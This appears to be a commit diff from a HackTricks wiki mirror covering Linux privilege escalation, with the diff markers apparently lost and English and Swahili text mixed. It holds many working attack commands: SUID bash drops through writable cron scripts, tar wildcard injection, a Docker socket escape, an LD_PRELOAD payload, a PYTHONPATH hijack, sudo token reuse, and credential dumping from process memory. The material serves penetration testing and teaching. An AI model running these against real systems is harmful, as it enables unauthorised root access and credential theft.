mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Translated ['src/linux-hardening/privilege-escalation/README.md'] to sw

This commit is contained in:
parent 0dc09b4da6
commit d012ba79c8
@@ -793,6 +793,29 @@
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)

# 🤖 AI
- [AI Security](AI/README.md)
  - [AI Security Methodology](AI/AI-Deep-Learning.md)
  - [AI MCP Security](AI/AI-MCP-Servers.md)
  - [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
  - [AI Models RCE](AI/AI-Models-RCE.md)
  - [AI Prompts](AI/AI-Prompts.md)
  - [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
  - [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
  - [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
  - [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
  - [LLM Training](AI/AI-llm-architecture/README.md)
    - [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
    - [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
    - [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
    - [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
    - [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
    - [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
    - [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
    - [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
    - [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
    - [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)

# 🔩 Reversing

- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
@@ -850,17 +873,6 @@
  - [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
  - [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
- [Test LLMs](todo/test-llms.md)
- [LLM Training](todo/llm-training-data-preparation/README.md)
  - [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
  - [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
  - [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
  - [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
  - [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
  - [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
  - [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
  - [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
  - [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
  - [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
- [Burp Suite](todo/burp-suite.md)
- [Other Web Tricks](todo/other-web-tricks.md)
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
@@ -2,11 +2,11 @@

{{#include ../../banners/hacktricks-training.md}}

## System Information

### OS info

Let's start gaining some knowledge of the OS that is running
```bash
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
@@ -26,7 +26,7 @@ Any interesting info, passwords or API keys in the environment variables?
```
### Kernel exploits

Check the kernel version and whether there is some exploit that can be used to escalate privileges.
```bash
cat /proc/version
uname -a
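# Hedged suggestion (these helpers are not part of this page's commands and must be fetched separately):
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)" 2>/dev/null   # exploitdb lookup, if searchsploit is installed
# ./linux-exploit-suggester.sh    # https://github.com/The-Z-Labs/linux-exploit-suggester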
@@ -73,9 +73,9 @@ From @sickrov
```
sudo -u#-1 /bin/bash
```
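A quick pre-check sketch (assumption: the line above refers to the classic CVE-2019-14287 runas bypass, which only works against sudo older than 1.8.28 with a `(ALL, !root)`-style rule):
```bash
sudo -V | head -n1    # vulnerable versions are older than 1.8.28
sudo -l               # look for a "(ALL, !root)" runas specification
sudo -u#-1 /bin/bash  # user ID -1 is mis-resolved to 0, so this may drop a root shell
```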
### Dmesg signature verification failed

Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited.
```bash
dmesg 2>/dev/null | grep "signature"
```
@@ -131,7 +131,7 @@ docker-security/

## Drives

Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info.
```bash
ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
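# Hedged example (device and mount point are assumptions): try mounting anything listed but not mounted
# mount /dev/sdb1 /mnt 2>/dev/null && ls -la /mnt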
@@ -144,42 +144,42 @@ List useful binaries
```bash
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
```
Also, check if **any compiler is installed**. This is useful if you need to use some kernel exploit, as it's recommended to compile it on the machine where you are going to use it (or on a similar one).
```bash
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
```
### Vulnerable Software Installed

Check the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges...\
It is recommended to check manually the version of the more suspicious installed software.
```bash
dpkg -l #Debian
rpm -qa #Centos
```
If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine.

> [!NOTE] > _Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended to use applications like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_

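Where the full package listing is overwhelming, a quick and noisy triage sketch can help; the service names below are only examples, adapt them to the target:
```bash
# Grep the package list for a handful of commonly abused services (names are illustrative)
dpkg -l 2>/dev/null | grep -Ei "nagios|apache2|nginx|mysql|openssh|sudo|polkit"
rpm -qa 2>/dev/null | grep -Ei "nagios|httpd|nginx|mariadb|openssh|sudo|polkit"
```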
## Processes

Take a look at **what processes** are being executed and check if any process has **more privileges than it should** (maybe a tomcat being executed by root?)
```bash
ps aux
ps -ef
top -n 1
```
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse them to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detects those by checking the `--inspect` parameter inside the command line of the process.\
Also **check your privileges over the processes binaries**, maybe you can overwrite someone else's.

### Process monitoring

You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements is met.
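For instance, a typical run might look like this (a sketch; the binary name assumes you dropped a release build of pspy on the box):
```bash
./pspy64 -pf -i 1000   # print commands and file system events, scanning procfs every 1000 ms
```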
### Process memory

Some services of a server save **credentials in clear text inside the memory**.\
Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials.\
However, remember that **as a regular user you can read the memory of the processes you own**.

> [!WARNING]
> Note that nowadays most machines **don't allow ptrace by default**, which means that you cannot dump other processes that belong to your unprivileged user.
@@ -189,7 +189,7 @@ However, remember that **as a regular user you can read the memory
> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked.
> - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged.
> - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it requires the CAP_SYS_PTRACE capability.
> - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again.
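A quick way to see which of the above policies is active on the target (standard procfs/sysctl reads):
```bash
cat /proc/sys/kernel/yama/ptrace_scope       # 0-3, see the list above
sysctl kernel.yama.ptrace_scope 2>/dev/null  # same value via sysctl
```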
#### GDB

@@ -215,7 +215,7 @@ done
```
#### /proc/$pid/maps & /proc/$pid/mem

For a given process ID, **maps shows how memory is mapped within that process's** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the process's memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file.
```bash
procdump()
(
@@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS
```
### ProcDump for linux

ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it in [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
```
procdump -p 1714

@@ -281,7 +281,7 @@ If you find that the authenticator process is running:
ps -ef | grep "authenticator"
root      2027  2025  0 11:46 ?        00:00:00 authenticator
```
You can dump the process (see previous sections to find different ways to dump the memory of a process) and search for credentials inside the memory:
```bash
./dump-memory.sh 2027
strings *.dump | grep -i password
@@ -296,8 +296,8 @@ The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/hunt
| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
| LightDM (Ubuntu Desktop)                          | lightdm              |
| VSFTPd (Active FTP Connections)                   | vsftpd               |
| Apache2 (Active HTTP Basic Auth Sessions)         | apache2              |
| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                |

#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
```bash
@@ -336,11 +336,11 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
```
### Cron using a script with a wildcard (Wildcard Injection)

If a script executed by root has a "**\***" inside a command, you could exploit this to make unexpected things (like privesc). Example:
```bash
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
```
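The same wildcard idea applies to other binaries; a classic sketch (assuming a root cron job runs `tar cf backup.tar *` inside a directory you can write to):
```bash
cd /path/writable/by/you/and/used/by/the/root/cron   # hypothetical directory
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
# when the cron's "tar cf backup.tar *" runs, the file names are parsed as tar options and shell.sh executes as root
```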
**If the wildcard is preceded by a path like** _**/some/path/\***_ **, it's not vulnerable (even** _**./\***_ **is not).**

Read the following page for more wildcard exploitation tricks:

@@ -350,19 +350,19 @@ wildcards-spare-tricks.md

### Cron script overwriting and symlink

If you **can modify a cron script** executed by root, you can get a shell very easily:
```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p
```
If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you.
```bash
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
```
### Frequent cron jobs

You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.

For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do:
```bash
@@ -380,7 +380,7 @@ It is possible to create a cron job **putting a carriage return after a comment**

### Writable _.service_ files

Check if you can write any `.service` file; if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\
For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`**
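A minimal sketch of how that overwrite could be done from a shell (the unit path, service name and script location are assumptions):
```bash
# Hypothetical writable unit: point its ExecStart at a script you control, then wait for a restart/reboot
printf '%s\n' '#!/bin/bash' 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > /tmp/script.sh
chmod +x /tmp/script.sh
sed -i 's|^ExecStart=.*|ExecStart=/tmp/script.sh|' /etc/systemd/system/vulnerable.service
```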
### Writable service binaries

@@ -393,7 +393,7 @@ You can see the PATH used by **systemd** with:
```bash
systemctl show-environment
```
If you find that you can **write** in any of the folders of that path you may be able to **escalate privileges**. You need to search for **relative paths being used in service configuration** files like:
```bash
ExecStart=faraday-server
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
@@ -407,7 +407,7 @@ Then, create an **executable** with the **same name as the relative path binary** inside the folder

**Timers** are systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** can be used as an alternative to cron as they have built-in support for calendar time events and monotonic time events and can be run asynchronously.

You can enumerate all the timers with:
```bash
systemctl list-timers --all
```
@@ -417,9 +417,9 @@ If you can modify a timer you can make it execute some existing units
```bash
Unit=backdoor.service
```
In the documentation you can read what a Unit is:

> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.

Therefore, to abuse this permission you would need to:

@@ -439,26 +439,26 @@ Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd

## Sockets

Unix Domain Sockets (UDS) enable **process communication** on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through `.socket` files.

Sockets can be configured using `.socket` files.

**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured:

- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where the socket is going to listen** (the path of the AF_UNIX socket file, the IPv4/6 and/or port number to listen to, etc.)
- `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`.
- `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, followed by arguments for the process.
- `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
- `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option.

### Writable .socket files

If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
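A one-liner sketch of that modification (the unit path is an assumption; the backdoor path follows the example above):
```bash
# foo.socket is hypothetical; insert the pre-start command right after the [Socket] header
sed -i '/^\[Socket\]/a ExecStartPre=/home/kali/sys/backdoor' /etc/systemd/system/foo.socket
```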
### Writable sockets

If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability.

### Enumerate Unix Sockets
```bash
@@ -481,19 +481,19 @@ socket-command-injection.md

### HTTP sockets

Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but the files acting as unix sockets_). You can check this with:
```bash
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
```
If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.
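A small loop sketch to run that same probe against every unix socket found on disk (purely illustrative):
```bash
# Print the HTTP status code (if any) returned by each socket
for s in $(find / -type s 2>/dev/null); do
  curl -s --max-time 2 --unix-socket "$s" http://localhost/ -o /dev/null -w "%{http_code} $s\n" 2>/dev/null
done
```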
### Writable Docker Socket

The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it is writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available.

#### **Privilege Escalation with Docker CLI**

If you have write access to the Docker socket, you can escalate privileges using the following commands:
```bash
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
@@ -534,7 +534,7 @@ Upgrade: tcp

After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem.

### Others

Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).

@@ -564,11 +564,11 @@ runc-privilege-escalation.md

D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to efficiently interact and share data. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication.

The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it helps in broadcasting events or signals, fostering seamless integration among system components. For instance, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, enhancing user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex.

D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. These policies specify interactions with the bus, potentially allowing for privilege escalation through the exploitation of these permissions.

An example of such a policy is provided in `/etc/dbus-1/system.d/wpa_supplicant.conf`, detailing permissions for the root user to own, send to, and receive messages from `fi.w1.wpa_supplicant1`.

Policies without a specified user or group apply universally, while "default" context policies apply to everyone not covered by other specific policies.
```xml
@@ -614,7 +614,7 @@ lsof -i
```
### Open ports

Always check network services running on the machine that you weren't able to interact with before accessing it:
```bash
(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"
@@ -653,12 +653,12 @@ gpg --list-keys 2>/dev/null
```
### Big UID

Some Linux versions were affected by a bug that allows users with **UID > INT_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
**Exploit it** using: **`systemd-run -t /bin/bash`**
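A quick sanity-check sketch (assumption: you already control an account whose UID was set above INT_MAX):
```bash
id -u                      # e.g. 4000000000, which is larger than INT_MAX (2147483647)
systemd-run -t /bin/bash   # on affected polkit versions this may hand you a root shell
```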
### Groups

Check if you are a **member of some group** that could grant you root privileges:

{{#ref}}
interesting-groups-linux-pe/
@@ -694,11 +694,11 @@ If you don't mind making a lot of noise and the `su` and `timeout` binaries are present on the computer

### $PATH

If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located before** your writable folder in $PATH.
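A short sketch to spot candidate folders (this only checks your own $PATH; a root cron job or service may use a different one):
```bash
echo "$PATH" | tr ':' '\n' | while read -r d; do [ -w "$d" ] && echo "writable: $d"; done
```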
### SUDO and SUID

You could be allowed to execute some command using sudo, or they could have the suid bit. Check it using:
```bash
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries
@@ -714,7 +714,7 @@ less>! <shell_comand>
```
### NOPASSWD

Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.
```
$ sudo -l
User demo may run the following commands on crashlab:
@@ -726,19 +726,19 @@ sudo vim -c '!sh'
```
### SETENV

This directive allows the user to **set an environment variable** while executing something:
```bash
$ sudo -l
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
```
This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root:
```bash
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
```
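A sketch of what the hijack itself could look like; the module name must match something the root script imports, and `shutil` below is only an assumption used for illustration:
```bash
# Drop a rogue python module in a directory you control and force it into PYTHONPATH
cat > /dev/shm/shutil.py << 'EOF'
import os
os.system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash')
EOF
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
/tmp/rootbash -p
```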
### Sudo execution bypassing paths

**Jump** to read other files or use **symlinks**. For example in the sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_
```bash
sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less
@@ -755,7 +755,7 @@ sudo less /var/log/something /etc/shadow #Red 2 files
```
**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)

### Sudo command/SUID binary without command path

If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable
```bash
@@ -763,7 +763,7 @@ export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less
```
This technique can also be used if a **suid** binary **executes another command without specifying the path to it (always check with** _**strings**_ **the content of a weird SUID binary)**.

[Payload examples to execute.](payloads-to-execute.md)

@@ -776,7 +776,7 @@ For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
```
Then, when you call the suid binary, this function will be executed

### LD_PRELOAD & **LD_LIBRARY_PATH**

@@ -785,9 +785,9 @@ The **LD_PRELOAD** environment variable is used to specify one or more shared libraries
However, to maintain system security and prevent this feature from being exploited, particularly with **suid/sgid** executables, the system enforces certain conditions:

- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_).
- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges.
```
Defaults        env_keep += LD_PRELOAD
```
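The shared object compiled in the next hunk is not shown in this diff; a minimal sketch of what such a `/tmp/pe.c` usually contains (an assumption, mirroring the typical LD_PRELOAD payload):
```bash
# Hypothetical /tmp/pe.c matching the gcc command below
cat > /tmp/pe.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); setuid(0);
    system("/bin/bash");
}
EOF
```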
@@ -809,7 +809,7 @@ Then **compile it** using:
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
```
Finally, **escalate privileges** running
```bash
sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
```
@@ -892,9 +892,9 @@ this means that the library you have generated needs to have a function called `a_fun

### GTFOBins

[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **only inject arguments** in a command.

The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.

> gdb -nx -ex '!sh' -ex quit\
> sudo mysql -e '! /bin/sh'\
@@ -915,7 +915,7 @@ If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://

### Reusing Sudo Tokens

In cases where you have **sudo access** but not the password, you can escalate privileges by **waiting for a sudo command execution and then hijacking the session token**.

Requirements to escalate privileges:

@@ -928,7 +928,7 @@ Requirements to escalate privileges:

If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)

- The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't automatically get a root shell, do `sudo su`):
```bash
bash exploit.sh
/tmp/activate_sudo_token
@@ -947,7 +947,7 @@ sudo su
### /var/run/sudo/ts/\<Username>

If you have **write permissions** in the folder or on any of the files created inside the folder you can use the binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) to **create a sudo token for a user and PID**.\
For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing:
```bash
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
```
@@ -973,7 +973,7 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
```
### DOAS

There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```
permit nopass demo as root cmd vim
```
@@ -981,7 +981,7 @@ permit nopass demo as root cmd vim

If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash_profile) so that when the user executes sudo, your sudo executable is executed.

Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example [sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)

Or running something like:
```bash
@@ -1002,7 +1002,7 @@ sudo ls

### ld.so

The file `/etc/ld.so.conf` indicates **where the loaded configuration files are from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`

That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. These configuration files **point to other folders** where **libraries** are going to be **searched** for. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **This means that the system will search for libraries inside `/usr/local/lib`**.
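A short sketch to check whether any of those configuration files or the library directories they reference are writable by you (the directory list comes from the files themselves):
```bash
ls -l /etc/ld.so.conf /etc/ld.so.conf.d/ 2>/dev/null
for d in $(grep -h '^/' /etc/ld.so.conf.d/*.conf 2>/dev/null); do [ -w "$d" ] && echo "writable library dir: $d"; done
```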
@ -1075,14 +1075,14 @@ setfacl -b file.txt #Remove the ACL of the file
 | 
			
		||||
```bash
 | 
			
		||||
getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
## Open shell sessions
 | 
			
		||||
## Fungua vikao vya shell
 | 
			
		||||
 | 
			
		||||
Katika **toleo za zamani** unaweza **kuchukua** baadhi ya **session** za **shell** za mtumiaji mwingine (**root**).\
 | 
			
		||||
Katika **toleo za hivi karibuni** utaweza **kuungana** na session za screen tu za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **habari za kuvutia ndani ya session**.
 | 
			
		||||
Katika **toleo za zamani** unaweza **kudhibiti** baadhi ya **vikao** vya mtumiaji tofauti (**root**).\
 | 
			
		||||
Katika **toleo za hivi karibuni** utaweza **kuungana** na vikao vya skrini tu vya **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **habari za kuvutia ndani ya kikao**.
 | 
			
		||||
 | 
			
		||||
### screen sessions hijacking
 | 
			
		||||
### kudhibiti vikao vya skrini
 | 
			
		||||
 | 
			
		||||
**Orodha ya session za screen**
 | 
			
		||||
**Orodha ya vikao vya skrini**
 | 
			
		||||
```bash
 | 
			
		||||
screen -ls
 | 
			
		||||
screen -ls <username>/ # Show another user' screen sessions
 | 
			
		||||
@ -1097,7 +1097,7 @@ screen -x [user]/[session id]
 | 
			
		||||
```
 | 
			
		||||
## tmux sessions hijacking
 | 
			
		||||
 | 
			
		||||
Hii ilikuwa shida na **matoleo ya zamani ya tmux**. Sikuweza kuingilia kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na mamlaka.
 | 
			
		||||
Hii ilikuwa shida na **matoleo ya zamani ya tmux**. Sikuweza kuhamasisha kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na mamlaka.
 | 
			
		||||
 | 
			
		||||
**Orodha ya vikao vya tmux**
 | 
			
		||||
```bash
 | 
			
		||||
@ -1117,33 +1117,33 @@ rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs c
 | 
			
		||||
# If you are root or devs you can access it
 | 
			
		||||
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
 | 
			
		||||
```
 | 
			
		||||
Check **Valentine box from HTB** for an example.
 | 
			
		||||
Angalia **Valentine box kutoka HTB** kwa mfano.
 | 
			
		||||
 | 
			
		||||
## SSH
 | 
			
		||||
 | 
			
		||||
### Debian OpenSSL Predictable PRNG - CVE-2008-0166
 | 
			
		||||
 | 
			
		||||
Mfunguo wote wa SSL na SSH ulioanzishwa kwenye mifumo ya msingi ya Debian (Ubuntu, Kubuntu, nk) kati ya Septemba 2006 na Mei 13, 2008 unaweza kuathiriwa na hitilafu hii.\
 | 
			
		||||
